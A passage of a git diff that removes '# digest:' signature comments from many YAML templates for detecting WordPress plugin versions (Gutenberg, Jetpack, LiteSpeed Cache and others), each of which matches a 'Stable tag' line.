490a0046304402201d2d4c1681b4d4ea63d099f51021e5803f6c4147be6e42d87f4801c1e027ae23022079bf6cec4d6983d44067dd0223e7cb1cd12dfe66f2dc53e9b73168413830e54d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b5faa006ed..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b621f62d824d13ed53993b77866df5e0a70305794746925577a513b10edd05f4022100ee728f08b55472761974af86c16425e60f923665c2ef234cbfe273d642894f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 19657ac897..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203fe945b3f29e947ff7e8d4529e630571254807df2573f63dcce8450855326642022100f45a6712f47153bccb88b254a9e9855a3c5d37aed12d12206e265a2f2a9f63fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 09b3b814b9..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022051bd3087bfbe0e804b6d5c4dbb7d503aee676c01da336ac5b657e4a11a06d5b50221008073ef65d8e23bab9874e2edcfca45864c15cbee3dfc95a17bea42dc6b9770ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index c084451bdd..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201f9b683cb9f1468e659767445ac6d27677f7e2e009ec11f74cda55e2eee9abb80221009b2ee4b2b97cc32b4611774099e6ac1c478caa9fb01bc95fd9a8df0ce0eb3cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index c0d0fc40af..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d9ae0ae0dd8dcb632e9a681e5f99ab6bcf9e9bc97780082b4bd62914cee8d4f022100f1fcc820e911037b39ee5fff304dc69a50da9106f53ed20f8677c4f74a755331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 591f2942b4..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073d08d77a92d7cdc123cfc788cc7cf2c7bc547a4acdf8bffa2fe68a579169f77022047f2d93d2c17702073da3ba0b94c27c0217357d88d28b0e6c51883f63e9cacbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index a9f91a7d7d..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030dc21bdae8b741a4950dfa1b13166be2a9cba754583018d48611ce3a8f618eb0220791ba548a3e587f9b7fe8b56078a9145bb008a3bf5646329cb9545c24d035f85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 30fab7d4db..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f3212023a7fa445a9d90e89470c1fe5d3132b8c6cd5a589ffca3028cf5d8740022100ddb9ed1445c44ec4e10cf6f4dc5e9fe18919977fadd107634cd7d6cc7ebc2c5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 412bf0bddc..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220467a62ce7387b8f5461f98e79f783c4d7368e8b84964b61492154981f04833f80220567d4c039df1381f409b5f4520cc6643dd56ab10ca2a9a704550085d07a7c541:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 863d58fd9d..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a1b0472d13d229ac1b8d6c9d30f85e61c9729d405bef6697da05ca17cff2e4902210099b019cb336179c139baf5feea0eced58a1fda8d5a4ccd4704f040a946f5cfb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index f175ce85e6..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045d8b98b1f45deb6adc212834a0cd3b2441a58335b99a4264410481cd105099d022025e339102a2a67a72b789bbf8454415d1d4039619b3a9bf4e8a5d1dccdf01ed0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 2dcc065e2a..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100accc14eaa1ab29e67e8c89188bcab9b40261b319de0f1883b850cd8a050513330221009783ace3ec04851123cafdc800be3af9f0ca62ed27158fe77b4214c862be6783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 96dd52682f..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210092dc526e697195e7fd5a7becebfc17ca56393a7aef5e862f0eec751308260fc8022100a5e165d4699d1975c35444112b551a6a0b4c26b27da0b171d61e1fb2fc1b2af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index d90407123e..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206c92a3e040b3c899c84f2d448415f2c0ae030165b32d7605afa9bdf30618c25d022100996e0520a30c294a6c93ce1a0f93c3b6a112c9e7866fce58533bda8de99fcb7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index ee126f3dc4..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bf9b3bf470af8b653334d63ab6f2dbdf55cd51b90527083c91b25e2d49a4c8b20220142ccbc4fc3b697c8a7b5bcc4c5299dac73718d03172fd5b917df87201cc6413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 95e3046fd5..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008abc2bf1b839a386608c25d22f12d9ec786a927623d9d14afe12f8df0aefa15202200d328257f70f659d7c767b88112ce1b3389aaf956f88bd6879b9f984cc91f4f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 31bc28ae03..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200da173e4d82f155b861bf7435c0da2b139fba2de05827dc84a94d4624d83173002206d08d59e6eebc0ebb3c00de11b3f88e75c4e7840a617e0b332fc246c36a6a1cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 0dac7fa3cf..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206af07fff3aff398155ab5ff7dc33556a1586b2572ce0994e3c00407ceff923e6022100f39e99684c4254d88b7d815845ab223b1bcc00c80e540635f5325317981ba416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 8a60c0a7b9..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220063572786fbc0ba2ba12e0d70dd64a191be05596ab517ba226d6eda62166caff02201f1ca813cf47a94d143715f5de2d944fc661b5377bb84fee864b6ba0c98d4c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index add19555e8..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022006560ecb1d6aaf4ba5be258f0f3d812478cd46e4c5363cd23b135913688d0224022072381b7e8d433a04d3c7c2cda9fd5552095adca29ec79498d0100029955a2536:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 11b5382905..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d7c632b9473e5b74627c2a84d80275b84000366ac6f29a70c258be7b5dc6f35022100e43df9f96559b337488ae94f9dc56a5b12aceba7f8413486a31cebafcb2af419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 2b0050ed5d..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e8e0cb796ea8619637c57010e6818ae33b6d43752912ab10d949407c8adb590a022100a966c7e3bc1e15da0a51e745d9589863e43acf2793276f850ac7fe57f5e06f4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index bccd70d01f..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c98916f9470a625b2a1480c0f51e16ae6f70fe05f3930c96243c6217e243287022059f928b4c5c3adbd3fdaff34bc89c728d93979bfde3c4df0697116aecf7b5cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 41ec33eaf9..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad33122255a5b56a82b57754bb5e560cd0dc1ab54c498a26b1cffbe684d43b5b022100f92b8e8cd9b891e968fa6751ad93e185c2bfc23762c367426ec6acf763127c16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 8cabeba8fc..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d78dbe882cdf3f350fe112615a54ff4326ac4d142d4b7350e3bc39be6b4278da02206f8dd6447dd3d1faba36fde2cf26184e19376411d82f54556079ffa728ac5162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 6124f1d152..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d806f7034157f5f6d280730223094234358f3bf03406f25b08ac132aef0840c302204bf8a54f6882c3951e3c54204c070bb167beeebec1e82e709b0d67bffdcfbe34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 722220fb68..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205114e19bebba78f8e1f43e8001b2976a14d75b929beeea56adcbe0e0733e462902210080ea875e985993b04a7966b0c1a29f6fb00dbfd09c53d9854a3877342da5a120:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index be4d77bedb..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085c2fadc0ce842d579235159adff414201e55825df460d6ee9d64d2bba86da4b022100c91e12672a026ce28b25fdc733639c24fa6fe6fdc0cbdbda8c46ad061dc3d4c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 5885850564..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d56fdc3cbdafadc3e3cf5c42ebd1cf839204353555e189516a30d166e0dd25660220434ab72b3f1ff47d443097b6484022e4a31f04562b415c85d824640e3f0112a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 7055bac3a7..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220154e744a00ab4bbf505baa00c963f8cfc750babce6bd66a81d37c3be867e318f02210098412998c92c32a31c113445d65b731ef5cd919ac74f094b5e292d4468b18a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 8362b0a59b..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022040665f58dd16cba80533650056e9fd1915238e09217e9b3012da0f89870a4e93022100cfa44ba30444c03c26c7ab27b1bd307e760d30fb5311f9e9e2a7636836f914e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 9ef80600be..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a52b34b53aff49ea5bc1412c28b554d4b6a816effbfb06f018054c5d59c8f0a02206780cc82268f1b20b5868f5bf416142735cff61fdc1193e5bc3009c3c383fc89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 0d32114f91..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220663ac2a6371fb527570b274d640187a5b51ab6a03dc083e743556c46f1ef0b07022059eb67479bdf40d8b882abb414b35d00cf235004f61829c8c9f154055cc080ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 8fae12a5ef..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204fcc6eb605b690c38319aeedb86d1424177b4357123ea25a3b5375abeef4569002205c8a0a2dd64dbeaf0c18c6f39146eef7e1a3051bbf41a34e62abab1a67d1c48e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index e141be519e..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203edb6a2a9594e958b42f9a53572f61b1682c8e186c2894f159ef1027d2cdf659022068819d039d16f5e312cf032bdc8ff366fe253a7af9e4d3173429f011c79611a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 71b6bba44a..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220276b3034ee2ad0af8b34b4e1126b73e16e521982eada557b05a55faa2fb878e502205df012a1714bbb2ba289d1d2535177f4efb3e611749fadcd9c087852630469f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 1176041ed1..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202b11ddeaaad7a35ed935c3aa5c92537f7d035f255e7c11cf3411beeb7d5e9ad102204f1f6de073bd9fdd1a1fa74c883f62e5aea610dd091c393dfe75e4528ab59f10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 3b25b15546..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205741813b7eebd9a1619373d3a07896b28aaa306d32d1ff5fffef7cdda8f8ae2d02200dce38d38b8be9329ec0eed83ecc1bb3f318d68ce8a8629e35c04e1ce0199af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b34cee5478..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203cd90e5b991c8e91fa97b8c7e309c8475f691ec0b7704c9a81747002bd6a2175022100cc713a6464135d4d86625c74a182fbdfc5e91858efbc932313a140fd586976d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 5ff8094eeb..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f0965084183d5945832f2a0218a706b6ed12a76a573bf4f6c2476af77d8a56a02200a1aa89de81f8350e490cd39b7379014ac9a4831cb1b6260a395ba1363a2685d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index d3d257467d..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082dceb4eea25d3a0ed79b14e2dcd1ef814c04df0c2ed8ceaf897271744bec99302202c3ff12e793400ddc6eaef5670c195559d0f46a437aca01a25833c8ea1fdf872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 347a976b12..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd3301e6ddcd48240427a026588a2e0f75337d28776bfc88c6695a95d9e84940022100ea4bcfc7d90c3adf62ac2721805e4757787cccefd4664c864f8d7638ac507d4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 6928e4e17d..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033fc8500446853068ff183a388500a6db114d36fff0a51b5ba563313dbd0eb01022100f950b72e5aff74a5841c14dde97b0f86306353d1fec7fa2e4e96a75312af1862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index ed332c59bd..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015344364ca01879b5b2f1b535294566022ca49d4656aac0aacbccf4794b5fc6d02205a2199182d2761951dff13b5bb72d60783a0e3f0d12d1421750f1589e62a33f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index a2224608f9..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b138e17174d48a651ec5bfebe610a975cc1f324635eac14a654f9487e8de26bd022100d08fb9ea0d0029807fe44e07e99189eed3fc0be8539d207c59e5f1a9acee06b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index f6e4da7338..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022915038d5d743962b4b9284a03c83d9bb0cf8baabe07b36d04769a75fdfedb802204f8031913b6b6ca8a6a82e57057462ce01c0b49508a81a21ac8f1c8d4e100bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a0aa724b07..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa08097f2932f86cc730062ad133062c9f98167e040220c914f7ebbb256d4e4502210080ce9bdc3110871bf36b63647439863283cb9bb6a92bc86b020ca96c0434b3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index bbb34d413a..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ 